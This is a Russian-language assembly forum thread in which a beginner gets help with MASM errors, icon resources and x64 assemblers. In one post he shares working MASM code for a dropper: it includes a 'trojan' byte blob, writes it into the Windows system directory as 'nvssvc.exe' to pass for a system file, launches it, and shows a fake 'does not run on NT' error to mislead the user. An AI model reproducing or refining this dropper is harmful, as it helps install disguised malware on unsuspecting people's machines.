WriteFile

Тема в разделе "WASM.BEGINNERS", создана пользователем fragment, 11 май 2010.

Статус темы:
Закрыта.
  1. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    DumpLen equ Point-DumpLen тоетсь ... ?
     
  2. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Спасибо огромное щас папробую
     
  3. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Вот я только не понял почему нельзя написать

    Код (Text):
    1. DumpDB db 0C2h, 0C4h
    2. DumpLen equ (offset DumpLen - offset DumpDB)
    это же логично.. но пишет ошибку

    Код (Text):
    1. Microsoft (R) Macro Assembler Version 9.00.30729.01
    2. Copyright (C) Microsoft Corporation.  All rights reserved.
    3.  
    4.  Assembling: test.txt
    5. test.txt(46) : error A2039:line too long
    6. test.txt(46) : error A2123:text macro nesting level too deep
    7. test.txt(46) : error A2009:syntax error in expression
    8.  
    9. There has been an error while assembling this project.
    46 строка на сколько я понимаю это начало дампа
     
  4. Clerk

    Clerk Забанен

    Публикаций:
    0
    Регистрация:
    4 янв 2008
    Сообщения:
    6.689
    Адрес:
    РБ, Могилёв
    fragment
    Нет в этом ничего логичного, наоборот бред какойто.
    Короче добро пожаловать в WASM.BEGINNERS или WASM.COMMERCE :))
     
  5. igorgrishin

    igorgrishin New Member

    Публикаций:
    0
    Регистрация:
    13 май 2010
    Сообщения:
    1
    fragment
    Кинь картинку-обоину с девкой. Понравилась)
     
  6. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Код (Text):
    1. DumpDB:
    2.     db 0C2h, 0C4h
    3. Point:
    4.  
    5. DumpLen equ (offset Point - offset DumpDB)
    Метки в масм так не стаятся , покажи нормально как ето делаеься пожалуйста да и выражение не принемает компилятор, или размещать метки в секции .code...я кароче упарился на етой маленькой теме :dntknw:
     
  7. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Новая ошибка , теперь не создается фаил, кол я не менял.. почему ?

    [​IMG]

    [​IMG]

    Я ничего не понимаю, помагите!!! Раньше то он создавался.
     
  8. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    все ошибку вижу, слеш не в ту сторону памойму
     
  9. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.546
    Адрес:
    Russia
    Вы бы хотя бы проверяли возвращаемые значения у API функций. А то вообще разленились.
     
  10. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Код (Text):
    1. .586p
    2. .model flat,stdcall
    3. option casemap:none
    4.  
    5. includelib  ./lib/kernel32.lib
    6. includelib  ./lib/user32.lib
    7. includelib      ./lib/shell32.lib
    8. include         ./trojan.txt
    9.  
    10. .code
    11. start:
    12.  
    13. GetSystemDirectoryA PROTO :DWORD,:DWORD
    14. push 260h
    15. push offset Buff_1
    16. call GetSystemDirectoryA
    17.  
    18. .data?
    19. Buff_1 db 260h dup(?)
    20. hFile dd ?
    21. pBytesWritten dw ?
    22.  
    23. .data
    24. exename  db "\nvssvc.exe",0
    25. TextOpen db "open",0
    26.  
    27. .code
    28.  
    29. lstrcatA PROTO :DWORD,:DWORD
    30. push offset exename
    31. push offset Buff_1
    32. call lstrcatA
    33.  
    34. CreateFileA PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    35. push 0h
    36. push 0h
    37. push 2h
    38. push 0h
    39. push 1h+2h
    40. push 80000000h+40000000h
    41. push offset Buff_1
    42. call CreateFileA
    43.  
    44. mov hFile,eax
    45.  
    46. WriteFile PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    47. push 0h
    48. push offset pBytesWritten
    49. push TrojanLen
    50. push offset Trojan
    51. push eax
    52. call WriteFile
    53.  
    54. CloseHandle PROTO :DWORD
    55. push hFile
    56. call CloseHandle
    57.  
    58. ShellExecuteA PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
    59. push 0
    60. push 0
    61. push 0
    62. push offset Buff_1
    63. push offset TextOpen
    64. push 0
    65. call ShellExecuteA
    66.  
    67. .data
    68. MessBoxA db "Программа не работает на платформе NT.",0
    69.  
    70. .code
    71. MessageBoxA PROTO :DWORD,:DWORD,:DWORD,:DWORD
    72. push 00000030h
    73. push 0h
    74. push offset MessBoxA
    75. push 0h
    76. call MessageBoxA
    77.  
    78. ExitProcess PROTO :DWORD
    79. call ExitProcess
    80.  
    81.  
    82. end start
    Заработал только вот такой код, почему я так и не понял
     
  11. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Новую тему создавать уж не буду.. почему rc пишет ошибку ?
    Код (Text):
    1. Microsoft (R) Windows (R) Resource Compiler, Version 5.00.1823.1 - Build 1823
    2. Copyright (C) Microsoft Corp. 1985-1998. All rights reserved.
    3.  
    4. Using codepage 1251 as default
    5. Creating rsrc.RES
    6. RC: RCPP -CP 1251 -f C:\Users\└ыхъёхщ\Downloads\compiler\RCa02796 -g C:\Users\└ыхъёхщ\Downloads\compiler\RDa02796 -DRC_INVOKED -D_WIN32
    7.  -pc\:/ -E -I. -I .
    8.  
    9. rsrc.rc.rsrc.rc (1): error RC2176 : old DIB in test.ico; pass it through SDKPAINT
    там только одна иконка х128 190 кб с х32 700б все компилилось
    но для новых систем нужны иконки побольше

    Код (Text):
    1. 500 ICON MOVEABLE PURE LOADONCALL DISCARDABLE "test.ico"
     
  12. G13

    G13 New Member

    Публикаций:
    0
    Регистрация:
    24 мар 2006
    Сообщения:
    499
    Как вы думаете, RC.EXE двенадцатилетней давности может быть в курсе нового расширения .ico-формата, включающего PNG-иконки?
     
  13. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Так что же мне делать ? Вроде ето обычные ico , хотя кто знает что там внутри. Как все же приварить иконку для систем Vista\7 ?
     
  14. max7C4

    max7C4 New Member

    Публикаций:
    0
    Регистрация:
    17 мар 2008
    Сообщения:
    1.203
    fragment
    1) ручками
    2) google
     
  15. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    Падумываю перепесать мою програмук под х64 fasm , у masm'a же нету компилятора под х64 или уже есть?
     
  16. TermoSINteZ

    TermoSINteZ Синоби даоса Команда форума

    Публикаций:
    2
    Регистрация:
    11 июн 2004
    Сообщения:
    3.546
    Адрес:
    Russia
    fragment
    Как это нет. Есть конечно ml64.exe.
    http://msdn.microsoft.com/ru-ru/library/hb5z4sxd(VS.90).aspx
    http://www.masm32.com/board/index.php?topic=10880.0
     
  17. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    А откуда можно его вытащить\скачать , в Microsoft Visual Studio 2010 Express он вроде не входяит, яб его заметил там..
     
  18. G13

    G13 New Member

    Публикаций:
    0
    Регистрация:
    24 мар 2006
    Сообщения:
    499
    Ага, значит студия у вас есть. А достать из неё свежий rc.exe (+ rcdll.dll) и им воспользоваться религия не позволяет?

    Из полной (не Express) Visual Studio 2005-2010 или отдельных дошлёпков/сервиспаков к оным. Например, в VS2008 SP1 должен быть.
     
  19. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    В висуал студио я rc.exe почему-то не нашел, будем искать лучьше
     
  20. fragment

    fragment New Member

    Публикаций:
    0
    Регистрация:
    11 июн 2008
    Сообщения:
    266
    ...понял не дурак :)
     
Статус темы:
Закрыта.